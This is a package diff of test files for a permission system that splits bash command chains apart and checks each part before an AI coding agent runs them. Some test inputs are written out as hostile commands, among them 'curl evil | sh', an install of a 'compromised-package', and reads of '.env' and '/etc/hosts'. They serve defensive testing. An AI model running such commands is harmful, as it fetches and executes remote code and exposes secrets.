@gotgenes/pi-permission-system 8.3.2 → 9.0.1

package/test/handlers/gates/bash-command.test.ts

@@ -0,0 +1,167 @@
+import { describe, expect, it, vi } from "vitest";
+
+import { resolveBashCommandCheck } from "#src/handlers/gates/bash-command";
+import type { Rule } from "#src/rule";
+import type { PermissionCheckResult } from "#src/types";
+
+import { makeCheckResult } from "#test/helpers/handler-fixtures";
+
+type CheckPermissionFn = (
+  surface: string,
+  input: unknown,
+  agentName?: string,
+  sessionRules?: Rule[],
+) => PermissionCheckResult;
+
+/** Build a bash-surface check result for a single command unit. */
+function bashResult(
+  state: PermissionCheckResult["state"],
+  command: string,
+  matchedPattern?: string,
+): PermissionCheckResult {
+  return makeCheckResult({ state, source: "bash", command, matchedPattern });
+}
+
+describe("resolveBashCommandCheck", () => {
+  it("passes a single command straight through", async () => {
+    const decompose = vi.fn(async () => ["npm install pkg"]);
+    const checkPermission = vi
+      .fn<CheckPermissionFn>()
+      .mockReturnValue(bashResult("allow", "npm install pkg", "npm *"));
+
+    const result = await resolveBashCommandCheck(
+      "npm install pkg",
+      undefined,
+      [],
+      checkPermission,
+      decompose,
+    );
+
+    expect(result.state).toBe("allow");
+    expect(checkPermission).toHaveBeenCalledTimes(1);
+    expect(checkPermission).toHaveBeenCalledWith(
+      "bash",
+      { command: "npm install pkg" },
+      undefined,
+      [],
+    );
+  });
+
+  it("denies the chain when any sub-command is denied, reporting that command's pattern", async () => {
+    const decompose = vi.fn(async () => ["cd /p", "npm install pkg"]);
+    const checkPermission = vi
+      .fn<CheckPermissionFn>()
+      .mockImplementation((_surface, input) => {
+        const command = (input as { command: string }).command;
+        return command.startsWith("npm")
+          ? bashResult("deny", command, "npm *")
+          : bashResult("allow", command, "cd *");
+      });
+
+    const result = await resolveBashCommandCheck(
+      "cd /p && npm install pkg",
+      undefined,
+      [],
+      checkPermission,
+      decompose,
+    );
+
+    expect(result.state).toBe("deny");
+    expect(result.matchedPattern).toBe("npm *");
+    expect(result.command).toBe("npm install pkg");
+  });
+
+  it("asks when a sub-command asks and none denies", async () => {
+    const decompose = vi.fn(async () => ["cd /p", "git push"]);
+    const checkPermission = vi
+      .fn<CheckPermissionFn>()
+      .mockImplementation((_surface, input) => {
+        const command = (input as { command: string }).command;
+        return command.startsWith("git")
+          ? bashResult("ask", command, "git *")
+          : bashResult("allow", command, "cd *");
+      });
+
+    const result = await resolveBashCommandCheck(
+      "cd /p && git push",
+      undefined,
+      [],
+      checkPermission,
+      decompose,
+    );
+
+    expect(result.state).toBe("ask");
+    expect(result.matchedPattern).toBe("git *");
+    expect(result.command).toBe("git push");
+  });
+
+  it("returns the first allow result when every sub-command is allowed", async () => {
+    const decompose = vi.fn(async () => ["a", "b"]);
+    const checkPermission = vi
+      .fn<CheckPermissionFn>()
+      .mockImplementation((_surface, input) => {
+        const command = (input as { command: string }).command;
+        return bashResult("allow", command, `${command} *`);
+      });
+
+    const result = await resolveBashCommandCheck(
+      "a && b",
+      undefined,
+      [],
+      checkPermission,
+      decompose,
+    );
+
+    expect(result.state).toBe("allow");
+    expect(result.matchedPattern).toBe("a *");
+  });
+
+  it("falls back to the whole command when no top-level commands are found", async () => {
+    const decompose = vi.fn(async () => []);
+    const checkPermission = vi
+      .fn<CheckPermissionFn>()
+      .mockReturnValue(bashResult("ask", "( rm x )", "*"));
+
+    const result = await resolveBashCommandCheck(
+      "( rm x )",
+      undefined,
+      [],
+      checkPermission,
+      decompose,
+    );
+
+    expect(result.state).toBe("ask");
+    expect(checkPermission).toHaveBeenCalledTimes(1);
+    expect(checkPermission).toHaveBeenCalledWith(
+      "bash",
+      { command: "( rm x )" },
+      undefined,
+      [],
+    );
+  });
+
+  it("forwards the agent name and session rules to each sub-command check", async () => {
+    const sessionRules: Rule[] = [
+      { surface: "bash", pattern: "npm *", action: "allow", origin: "session" },
+    ];
+    const decompose = vi.fn(async () => ["npm i"]);
+    const checkPermission = vi
+      .fn<CheckPermissionFn>()
+      .mockReturnValue(bashResult("allow", "npm i"));
+
+    await resolveBashCommandCheck(
+      "npm i",
+      "agent-x",
+      sessionRules,
+      checkPermission,
+      decompose,
+    );
+
+    expect(checkPermission).toHaveBeenCalledWith(
+      "bash",
+      { command: "npm i" },
+      "agent-x",
+      sessionRules,
+    );
+  });
+});

package/test/handlers/gates/bash-program.test.ts

@@ -0,0 +1,107 @@
+import { describe, expect, it } from "vitest";
+
+import { BashProgram } from "#src/handlers/gates/bash-program";
+
+describe("BashProgram", () => {
+  describe("pathTokens", () => {
+    it("returns dot-files and relative path tokens", async () => {
+      const program = await BashProgram.parse("cat .env src/foo.ts");
+      expect(program.pathTokens()).toEqual([".env", "src/foo.ts"]);
+    });
+
+    it("returns an empty array when there are no path tokens", async () => {
+      const program = await BashProgram.parse("echo hello");
+      expect(program.pathTokens()).toEqual([]);
+    });
+
+    it("deduplicates repeated tokens across a command chain", async () => {
+      const program = await BashProgram.parse("cat .env && rm .env");
+      expect(program.pathTokens()).toEqual([".env"]);
+    });
+  });
+
+  describe("externalPaths", () => {
+    const cwd = "/projects/my-app";
+
+    it("returns absolute paths resolving outside cwd", async () => {
+      const program = await BashProgram.parse("cat /etc/hosts");
+      // Subset matcher: the path is normalized before comparison.
+      expect(program.externalPaths(cwd)).toContain("/etc/hosts");
+    });
+
+    it("excludes paths within cwd", async () => {
+      const program = await BashProgram.parse("cat src/index.ts");
+      expect(program.externalPaths(cwd)).toHaveLength(0);
+    });
+  });
+
+  describe("topLevelCommands", () => {
+    it("returns a single-element list for a lone command", async () => {
+      const program = await BashProgram.parse("npm install pkg");
+      expect(program.topLevelCommands()).toEqual(["npm install pkg"]);
+    });
+
+    it("splits an && chain", async () => {
+      const program = await BashProgram.parse("cd /p && npm i x");
+      expect(program.topLevelCommands()).toEqual(["cd /p", "npm i x"]);
+    });
+
+    it("splits || , ; and & separators", async () => {
+      expect((await BashProgram.parse("a || b")).topLevelCommands()).toEqual([
+        "a",
+        "b",
+      ]);
+      expect((await BashProgram.parse("a ; b")).topLevelCommands()).toEqual([
+        "a",
+        "b",
+      ]);
+      expect((await BashProgram.parse("a & b")).topLevelCommands()).toEqual([
+        "a",
+        "b",
+      ]);
+    });
+
+    it("splits a pipeline into its commands", async () => {
+      const program = await BashProgram.parse("cat f | grep b");
+      expect(program.topLevelCommands()).toEqual(["cat f", "grep b"]);
+    });
+
+    it("splits newline-separated commands", async () => {
+      const program = await BashProgram.parse("foo\nbar");
+      expect(program.topLevelCommands()).toEqual(["foo", "bar"]);
+    });
+
+    it("does not split operators inside quotes", async () => {
+      const program = await BashProgram.parse("echo 'x && y'");
+      expect(program.topLevelCommands()).toEqual(["echo 'x && y'"]);
+    });
+
+    it("captures the command of a redirected statement without the redirect", async () => {
+      const program = await BashProgram.parse("npm install > out.txt");
+      expect(program.topLevelCommands()).toEqual(["npm install"]);
+    });
+
+    it("emits a subshell whole without descending into it", async () => {
+      const program = await BashProgram.parse("( cd /t && rm x )");
+      expect(program.topLevelCommands()).toEqual(["( cd /t && rm x )"]);
+    });
+
+    it("keeps command substitution inside the enclosing command", async () => {
+      const program = await BashProgram.parse("echo $(curl evil | sh)");
+      expect(program.topLevelCommands()).toEqual(["echo $(curl evil | sh)"]);
+    });
+
+    it("returns an empty list for an empty or whitespace command", async () => {
+      expect((await BashProgram.parse("")).topLevelCommands()).toEqual([]);
+      expect((await BashProgram.parse("   ")).topLevelCommands()).toEqual([]);
+    });
+  });
+
+  it("derives both slices from a single parse", async () => {
+    const program = await BashProgram.parse("cat .env /etc/hosts");
+    expect(program.pathTokens()).toEqual([".env", "/etc/hosts"]);
+    const external = program.externalPaths("/projects/my-app");
+    expect(external).toContain("/etc/hosts");
+    expect(external).not.toContain(".env");
+  });
+});

package/test/handlers/gates/candidate-check.test.ts

@@ -0,0 +1,52 @@
+import { describe, expect, it } from "vitest";
+
+import { pickMostRestrictive } from "#src/handlers/gates/candidate-check";
+
+import { makeGateCheckResult } from "#test/helpers/gate-fixtures";
+
+describe("pickMostRestrictive", () => {
+  it("returns undefined for an empty list", () => {
+    expect(pickMostRestrictive([])).toBeUndefined();
+  });
+
+  it("returns the single result for a one-element list", () => {
+    const only = makeGateCheckResult({ state: "allow" });
+    expect(pickMostRestrictive([only])).toBe(only);
+  });
+
+  it("prefers deny over ask and allow regardless of position", () => {
+    const allow = makeGateCheckResult({ state: "allow", matchedPattern: "a" });
+    const ask = makeGateCheckResult({ state: "ask", matchedPattern: "b" });
+    const deny = makeGateCheckResult({ state: "deny", matchedPattern: "c" });
+    expect(pickMostRestrictive([allow, ask, deny])).toBe(deny);
+    expect(pickMostRestrictive([deny, ask, allow])).toBe(deny);
+  });
+
+  it("prefers ask over allow when no deny is present", () => {
+    const allow = makeGateCheckResult({ state: "allow" });
+    const ask = makeGateCheckResult({ state: "ask" });
+    expect(pickMostRestrictive([allow, ask])).toBe(ask);
+  });
+
+  it("keeps the first deny on ties", () => {
+    const deny1 = makeGateCheckResult({
+      state: "deny",
+      matchedPattern: "first",
+    });
+    const deny2 = makeGateCheckResult({
+      state: "deny",
+      matchedPattern: "second",
+    });
+    expect(pickMostRestrictive([deny1, deny2])).toBe(deny1);
+  });
+
+  it("keeps the first ask on ties when no deny is present", () => {
+    const allow = makeGateCheckResult({ state: "allow" });
+    const ask1 = makeGateCheckResult({ state: "ask", matchedPattern: "first" });
+    const ask2 = makeGateCheckResult({
+      state: "ask",
+      matchedPattern: "second",
+    });
+    expect(pickMostRestrictive([allow, ask1, ask2])).toBe(ask1);
+  });
+});

package/test/handlers/lifecycle.test.ts

@@ -36,12 +36,18 @@ function makeHandler(
 ): {
   handler: SessionLifecycleHandler;
   session: PermissionSession;
+  activateService: ReturnType<typeof vi.fn>;
   cleanupRpc: ReturnType<typeof vi.fn>;
 } {
   const session = makeSession(overrides);
+  const activateService = vi.fn();
   const cleanupRpc = vi.fn();
-  const handler = new SessionLifecycleHandler(session, cleanupRpc);
-  return { handler, session, cleanupRpc };
+  const handler = new SessionLifecycleHandler(
+    session,
+    activateService,
+    cleanupRpc,
+  );
+  return { handler, session, activateService, cleanupRpc };
 }
 
 // ── handleSessionStart ─────────────────────────────────────────────────────
@@ -106,6 +112,13 @@ describe("handleSessionStart", () => {
     expect(session.logger.debug).not.toHaveBeenCalled();
   });
 
+  it("activates the service for the session with ctx", async () => {
+    const ctx = makeCtx();
+    const { handler, activateService } = makeHandler();
+    await handler.handleSessionStart({ reason: "startup" }, ctx);
+    expect(activateService).toHaveBeenCalledWith(ctx);
+  });
+
   it("calls refreshConfig before resetForNewSession", async () => {
     const callOrder: string[] = [];
     const { handler } = makeHandler({

package/test/handlers/tool-call.test.ts

@@ -287,3 +287,76 @@ describe("handleToolCall — bash path gate", () => {
     expect(result).toMatchObject({ block: true });
   });
 });
+
+// ── bash command chain gate ───────────────────────────────────────────────
+
+describe("handleToolCall — bash command chain gate", () => {
+  it("blocks a chain when a later sub-command is denied (#301)", async () => {
+    const checkPermission = vi
+      .fn()
+      .mockImplementation((surface: string, input: unknown) => {
+        if (surface === "bash") {
+          const command = (input as { command?: string }).command ?? "";
+          return /^npm\b/.test(command)
+            ? makeCheckResult({
+                state: "deny",
+                source: "bash",
+                command,
+                matchedPattern: "npm *",
+              })
+            : makeCheckResult({
+                state: "allow",
+                source: "bash",
+                command,
+                matchedPattern: "echo *",
+              });
+        }
+        return makeCheckResult({ state: "allow" });
+      });
+    const { handler } = makeHandler({
+      session: { checkPermission },
+      toolRegistry: {
+        getAll: vi.fn().mockReturnValue([{ name: "bash" }]),
+      },
+    });
+    const event = {
+      type: "tool_call",
+      toolCallId: "tc-bash-chain",
+      name: "bash",
+      input: { command: "echo start && npm install compromised-package" },
+    };
+    const result = await handler.handleToolCall(event, makeCtx());
+    expect(result).toMatchObject({ block: true });
+  });
+
+  it("allows a single non-chained bash command", async () => {
+    const checkPermission = vi
+      .fn()
+      .mockImplementation((surface: string, input: unknown) => {
+        if (surface === "bash") {
+          const command = (input as { command?: string }).command ?? "";
+          return makeCheckResult({
+            state: "allow",
+            source: "bash",
+            command,
+            matchedPattern: "echo *",
+          });
+        }
+        return makeCheckResult({ state: "allow" });
+      });
+    const { handler } = makeHandler({
+      session: { checkPermission },
+      toolRegistry: {
+        getAll: vi.fn().mockReturnValue([{ name: "bash" }]),
+      },
+    });
+    const event = {
+      type: "tool_call",
+      toolCallId: "tc-bash-single",
+      name: "bash",
+      input: { command: "echo hi" },
+    };
+    const result = await handler.handleToolCall(event, makeCtx());
+    expect(result).toEqual({});
+  });
+});

package/test/helpers/make-fake-pi.ts

@@ -0,0 +1,95 @@
+/**
+ * `makeFakePi()` — a composition-root test harness.
+ *
+ * Lets a test run the real `piPermissionSystemExtension(pi)` factory and then
+ * introspect and drive the result. Unlike the per-handler unit fixtures in
+ * `handler-fixtures.ts` (which inject collaborators), this harness exercises the
+ * factory itself — the wiring layer where registration completeness, shared-
+ * instance contracts, teardown, and event ordering live.
+ *
+ * It provides:
+ * - `events` — a real `createEventBus()` so cross-extension pub/sub and RPC
+ *   behave as in production (tests can inject a shared bus to model parent/child
+ *   instances).
+ * - `handlers` — every `pi.on(event, handler)` registration, keyed by event
+ *   name, so a test can assert completeness and fire handlers.
+ * - `commands` — every `pi.registerCommand(name, …)` registration.
+ * - `fire(event, input, ctx)` — drive a registered handler; resolves to its
+ *   (possibly async) result.
+ *
+ * The harness object is cast to `ExtensionAPI` at the call to the factory; the
+ * `FakePi` interface itself stays narrow (ISP — only what the factory touches).
+ */
+import { createEventBus, type EventBus } from "@earendil-works/pi-coding-agent";
+import { vi } from "vitest";
+
+/** A handler recorded by `pi.on(...)`, kept generic over event/result shapes. */
+export type RecordedHandler = (event: unknown, ctx: unknown) => unknown;
+
+export interface FakePi {
+  /** Real event bus so cross-extension pub/sub and RPC behave as in production. */
+  events: EventBus;
+  /** Every `pi.on(event, handler)` registration, keyed by event name. */
+  handlers: Map<string, RecordedHandler>;
+  /** Every `pi.registerCommand(name, …)` registration, keyed by command name. */
+  commands: Map<string, unknown>;
+  /**
+   * Drive a registered handler; resolves to its (possibly async) result.
+   *
+   * Throws if no handler is registered for `event` so a typo in a test surfaces
+   * loudly instead of silently resolving to `undefined`.
+   */
+  fire(event: string, input?: unknown, ctx?: unknown): Promise<unknown>;
+  /** Minimal tool registry — returns the configured tool names. */
+  getAllTools(): { name: string }[];
+  setActiveTools(names: string[]): void;
+}
+
+export interface MakeFakePiOptions {
+  /** Inject a shared bus to model parent/child instances; defaults to a fresh bus. */
+  events?: EventBus;
+  /** Tool names returned by `getAllTools()`; defaults to a small set. */
+  toolNames?: readonly string[];
+}
+
+const DEFAULT_TOOL_NAMES = ["read", "write", "edit", "bash", "ls", "grep"];
+
+/**
+ * Build a fake `ExtensionAPI` for composition-root tests.
+ *
+ * The returned object is structurally a `FakePi`; pass it to the factory as
+ * `piPermissionSystemExtension(pi as unknown as ExtensionAPI)`.
+ */
+export function makeFakePi(options: MakeFakePiOptions = {}): FakePi {
+  const events = options.events ?? createEventBus();
+  const toolNames = options.toolNames ?? DEFAULT_TOOL_NAMES;
+  const handlers = new Map<string, RecordedHandler>();
+  const commands = new Map<string, unknown>();
+
+  return {
+    events,
+    handlers,
+    commands,
+    fire(event, input, ctx): Promise<unknown> {
+      const handler = handlers.get(event);
+      if (!handler) {
+        throw new Error(`No handler registered for event "${event}"`);
+      }
+      return Promise.resolve(handler(input, ctx));
+    },
+    getAllTools(): { name: string }[] {
+      return toolNames.map((name) => ({ name }));
+    },
+    setActiveTools: vi.fn(),
+    // ── ExtensionAPI methods the factory touches (recorded) ────────────────
+    on(event: string, handler: RecordedHandler): void {
+      handlers.set(event, handler);
+    },
+    registerCommand(name: string, optionsArg: unknown): void {
+      commands.set(name, optionsArg);
+    },
+    // ── ExtensionAPI methods present for the cast but unused by the factory ─
+    registerProvider: vi.fn(),
+    exec: vi.fn(),
+  } as FakePi & Record<string, unknown>;
+}

package/test/permission-events.test.ts

@@ -279,10 +279,18 @@ describe("piPermissionSystemExtension ready event wiring", () => {
     rmSync(baseDir, { recursive: true, force: true });
   });
 
-  it("emits permissions:ready with protocolVersion when extension loads", () => {
+  it("emits permissions:ready with protocolVersion at session_start", async () => {
     const emitSpy = vi.fn();
+    const handlers = new Map<
+      string,
+      (event: unknown, ctx: unknown) => unknown
+    >();
     piPermissionSystemExtension({
-      on: vi.fn(),
+      on: vi.fn(
+        (event: string, handler: (e: unknown, c: unknown) => unknown) => {
+          handlers.set(event, handler);
+        },
+      ),
       registerCommand: vi.fn(),
       getAllTools: vi.fn().mockReturnValue([]),
       setActiveTools: vi.fn(),
@@ -290,6 +298,28 @@ describe("piPermissionSystemExtension ready event wiring", () => {
       events: { emit: emitSpy, on: vi.fn().mockReturnValue(() => undefined) },
     } as never);
 
+    // ready is not emitted at load — only after session_start publishes.
+    expect(
+      emitSpy.mock.calls.filter(([c]) => c === PERMISSIONS_READY_CHANNEL),
+    ).toHaveLength(0);
+
+    const ctx = {
+      cwd: baseDir,
+      hasUI: false,
+      sessionManager: {
+        getEntries: (): unknown[] => [],
+        getSessionId: (): string => "top-session",
+        getSessionDir: (): string => baseDir,
+      },
+      ui: {
+        notify: (): void => {},
+        setStatus: (): void => {},
+        select: async (): Promise<string | undefined> => undefined,
+        input: async (): Promise<string | undefined> => undefined,
+      },
+    };
+    await handlers.get("session_start")?.({ reason: "start" }, ctx);
+
     const readyCalls = emitSpy.mock.calls.filter(
       ([channel]) => channel === PERMISSIONS_READY_CHANNEL,
     );